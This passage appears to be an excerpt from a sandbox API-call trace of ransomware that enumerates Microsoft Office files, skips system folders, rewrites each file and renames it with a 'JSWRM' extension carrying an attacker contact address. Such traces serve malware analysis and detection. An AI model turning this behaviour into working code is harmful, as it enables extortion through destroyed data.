lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGSTORYVERT.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgstoryvert.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.186] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2948) returned 1 [0141.186] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.186] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xb80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xb80, lpOverlapped=0x0) returned 1 [0141.188] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.188] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xb80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xb80, lpOverlapped=0x0) returned 1 [0141.188] CloseHandle (hObject=0x238) returned 1 [0141.188] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGSTORYVERT.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgstoryvert.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGSTORYVERT.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgstoryvert.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.189] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a2da43, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a2da43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21bab08a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGTEAR.DPV", cAlternateFileName="")) returned 1 [0141.189] lstrcmpiW (lpString1="DGTEAR.DPV", lpString2=".") returned 1 [0141.189] lstrcmpiW (lpString1="DGTEAR.DPV", lpString2="..") returned 1 [0141.189] lstrcmpiW (lpString1="DGTEAR.DPV", lpString2="...") returned 1 [0141.189] lstrcmpiW (lpString1="DGTEAR.DPV", lpString2="windows") returned -1 [0141.189] lstrcmpiW (lpString1="DGTEAR.DPV", lpString2="recovery") returned -1 [0141.189] lstrcmpiW (lpString1="DGTEAR.DPV", lpString2="perflogs") returned -1 [0141.189] lstrcmpiW (lpString1="DGTEAR.DPV", lpString2="documents and settings") returned -1 [0141.189] lstrcmpiW (lpString1="DGTEAR.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.189] lstrcmpiW (lpString1="DGTEAR.DPV", lpString2="system volume information") returned -1 [0141.189] lstrcmpiW (lpString1="DGTEAR.DPV", lpString2="msocache") returned -1 [0141.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGTEAR.DPV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGTEAR.DPV", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGTEAR.DPV", lpUsedDefaultChar=0x0) returned 10 [0141.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGTEAR.DPV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGTEAR.DPV", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGTEAR.DPV", lpUsedDefaultChar=0x0) returned 10 [0141.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGTEAR.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgtear.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.190] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3072) returned 1 [0141.190] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.190] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xc00, lpOverlapped=0x0) returned 1 [0141.192] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.192] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xc00, lpOverlapped=0x0) returned 1 [0141.192] CloseHandle (hObject=0x238) returned 1 [0141.192] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGTEAR.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgtear.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGTEAR.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgtear.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.194] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21bab08a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21bab08a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21bab08a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe50e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGTOC.DPV", cAlternateFileName="")) returned 1 [0141.194] lstrcmpiW (lpString1="DGTOC.DPV", lpString2=".") returned 1 [0141.194] lstrcmpiW (lpString1="DGTOC.DPV", lpString2="..") returned 1 [0141.194] lstrcmpiW (lpString1="DGTOC.DPV", lpString2="...") returned 1 [0141.194] lstrcmpiW (lpString1="DGTOC.DPV", lpString2="windows") returned -1 [0141.194] lstrcmpiW (lpString1="DGTOC.DPV", lpString2="recovery") returned -1 [0141.194] lstrcmpiW (lpString1="DGTOC.DPV", lpString2="perflogs") returned -1 [0141.194] lstrcmpiW (lpString1="DGTOC.DPV", lpString2="documents and settings") returned -1 [0141.194] lstrcmpiW (lpString1="DGTOC.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.194] lstrcmpiW (lpString1="DGTOC.DPV", lpString2="system volume information") returned -1 [0141.194] lstrcmpiW (lpString1="DGTOC.DPV", lpString2="msocache") returned -1 [0141.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGTOC.DPV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGTOC.DPV", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGTOC.DPV", lpUsedDefaultChar=0x0) returned 9 [0141.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGTOC.DPV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGTOC.DPV", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGTOC.DPV", lpUsedDefaultChar=0x0) returned 9 [0141.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGTOC.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgtoc.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.195] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=58638) returned 1 [0141.195] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.195] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xe500, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xe500, lpOverlapped=0x0) returned 1 [0141.200] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.200] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xe500, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xe500, lpOverlapped=0x0) returned 1 [0141.200] CloseHandle (hObject=0x238) returned 1 [0141.200] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGTOC.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgtoc.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGTOC.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgtoc.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.201] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc74eab3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1712, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGTOC.XML", cAlternateFileName="")) returned 1 [0141.201] lstrcmpiW (lpString1="DGTOC.XML", lpString2=".") returned 1 [0141.201] lstrcmpiW (lpString1="DGTOC.XML", lpString2="..") returned 1 [0141.201] lstrcmpiW (lpString1="DGTOC.XML", lpString2="...") returned 1 [0141.201] lstrcmpiW (lpString1="DGTOC.XML", lpString2="windows") returned -1 [0141.201] lstrcmpiW (lpString1="DGTOC.XML", lpString2="recovery") returned -1 [0141.202] lstrcmpiW (lpString1="DGTOC.XML", lpString2="perflogs") returned -1 [0141.202] lstrcmpiW (lpString1="DGTOC.XML", lpString2="documents and settings") returned -1 [0141.202] lstrcmpiW (lpString1="DGTOC.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.202] lstrcmpiW (lpString1="DGTOC.XML", lpString2="system volume information") returned -1 [0141.202] lstrcmpiW (lpString1="DGTOC.XML", lpString2="msocache") returned -1 [0141.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGTOC.XML", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGTOC.XML", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGTOC.XML", lpUsedDefaultChar=0x0) returned 9 [0141.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGTOC.XML", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGTOC.XML", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGTOC.XML", lpUsedDefaultChar=0x0) returned 9 [0141.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGTOC.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgtoc.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.203] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5906) returned 1 [0141.203] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.203] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1710, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1710, lpOverlapped=0x0) returned 1 [0141.205] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.205] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1710, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1710, lpOverlapped=0x0) returned 1 [0141.205] CloseHandle (hObject=0x238) returned 1 [0141.205] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGTOC.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgtoc.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGTOC.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgtoc.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.206] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc74eab3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGWEBAD.XML", cAlternateFileName="")) returned 1 [0141.207] lstrcmpiW (lpString1="DGWEBAD.XML", lpString2=".") returned 1 [0141.207] lstrcmpiW (lpString1="DGWEBAD.XML", lpString2="..") returned 1 [0141.207] lstrcmpiW (lpString1="DGWEBAD.XML", lpString2="...") returned 1 [0141.207] lstrcmpiW (lpString1="DGWEBAD.XML", lpString2="windows") returned -1 [0141.207] lstrcmpiW (lpString1="DGWEBAD.XML", lpString2="recovery") returned -1 [0141.207] lstrcmpiW (lpString1="DGWEBAD.XML", lpString2="perflogs") returned -1 [0141.207] lstrcmpiW (lpString1="DGWEBAD.XML", lpString2="documents and settings") returned -1 [0141.207] lstrcmpiW (lpString1="DGWEBAD.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.207] lstrcmpiW (lpString1="DGWEBAD.XML", lpString2="system volume information") returned -1 [0141.207] lstrcmpiW (lpString1="DGWEBAD.XML", lpString2="msocache") returned -1 [0141.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBAD.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBAD.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBAD.XML", lpUsedDefaultChar=0x0) returned 11 [0141.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBAD.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBAD.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBAD.XML", lpUsedDefaultChar=0x0) returned 11 [0141.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBAD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.208] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=812) returned 1 [0141.208] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.208] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0141.210] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.210] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0141.210] CloseHandle (hObject=0x238) returned 1 [0141.210] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBAD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebad.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBAD.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebad.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.211] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a2da43, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a2da43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21bab08a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGWEBBTN.DPV", cAlternateFileName="")) returned 1 [0141.211] lstrcmpiW (lpString1="DGWEBBTN.DPV", lpString2=".") returned 1 [0141.211] lstrcmpiW (lpString1="DGWEBBTN.DPV", lpString2="..") returned 1 [0141.211] lstrcmpiW (lpString1="DGWEBBTN.DPV", lpString2="...") returned 1 [0141.211] lstrcmpiW (lpString1="DGWEBBTN.DPV", lpString2="windows") returned -1 [0141.212] lstrcmpiW (lpString1="DGWEBBTN.DPV", lpString2="recovery") returned -1 [0141.212] lstrcmpiW (lpString1="DGWEBBTN.DPV", lpString2="perflogs") returned -1 [0141.212] lstrcmpiW (lpString1="DGWEBBTN.DPV", lpString2="documents and settings") returned -1 [0141.212] lstrcmpiW (lpString1="DGWEBBTN.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.212] lstrcmpiW (lpString1="DGWEBBTN.DPV", lpString2="system volume information") returned -1 [0141.212] lstrcmpiW (lpString1="DGWEBBTN.DPV", lpString2="msocache") returned -1 [0141.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBBTN.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBBTN.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBBTN.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBBTN.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGWEBBTN.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGWEBBTN.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGWEBBTN.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgwebbtn.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.213] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10240) returned 1 [0141.213] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.213] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2800, lpOverlapped=0x0) returned 1 [0141.215] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.215] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2800, 